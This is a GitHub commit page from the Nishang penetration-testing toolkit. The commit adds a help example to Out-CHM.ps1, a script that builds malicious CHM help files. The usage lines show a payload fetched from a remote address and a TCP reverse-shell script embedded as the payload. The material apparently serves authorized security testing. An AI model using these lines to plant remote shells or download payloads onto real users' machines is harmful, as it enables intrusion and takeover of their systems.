Skip to content

Commit

Permalink
Changes to help of Out-CHM
Browse files Browse the repository at this point in the history
  • Loading branch information
samratashok committed Oct 4, 2016
1 parent 5cbae18 commit 706312b
Showing 1 changed file with 6 additions and 0 deletions.
6 changes: 6 additions & 0 deletions Client/Out-CHM.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -60,6 +60,12 @@ PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-
Use above command to pass an argument to the PowerShell script/module.
.EXAMPLE
PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1
Use above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter passed to it,
you must pass the parameters in the script itself.
.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang
Expand Down

0 comments on commit 706312b

Please sign in to comment.